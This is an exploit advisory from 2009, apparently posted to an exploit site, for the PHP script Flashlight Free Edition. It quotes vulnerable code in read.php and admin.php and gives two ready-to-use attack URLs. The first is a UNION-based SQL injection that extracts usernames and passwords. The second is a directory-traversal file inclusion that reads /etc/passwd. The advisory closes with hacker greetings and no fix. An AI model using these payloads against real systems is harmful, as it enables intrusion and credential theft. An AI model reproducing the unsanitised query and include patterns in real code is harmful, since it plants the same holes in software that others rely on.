Flashlight Free Edition (LFI-SQL) Multiple Remote Vulnerabilities

2009-06-02 18:05:07


XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Flashlight Free Edition - (LFI/SQL) Multiple Remote Vul
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

RATM: "All hell can't stop us now!"

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Author : k4m1k451

--[E-mail : [email protected]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Script : Flashlight

--[Download : http://scripts.ringsworld.com/communication-tools/flashlight-free-edition.zip
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--[Remote SQLi

--[File : read.php


--[Vul :
$id = $_GET['id'];
$sql = mysql_query("SELECT * FROM inbox WHERE msg_id='$id' AND msg_to='$user_id'");

--[Exploit :
http://localhost/flash/read.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x20,password),version(),user(),9+from+users--+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--[Local File Inclusion

--[File : admin.php
--[Vul :

$inc = $_GET['action'];
include ("admin/".$inc.".php");

--[Exploit :
http://localhost/flash/admin.php?action=../../../../../../../../etc/passwd%00

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Gr3etz: c0d3_z3r0, 0ut0fBound, str0ke

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.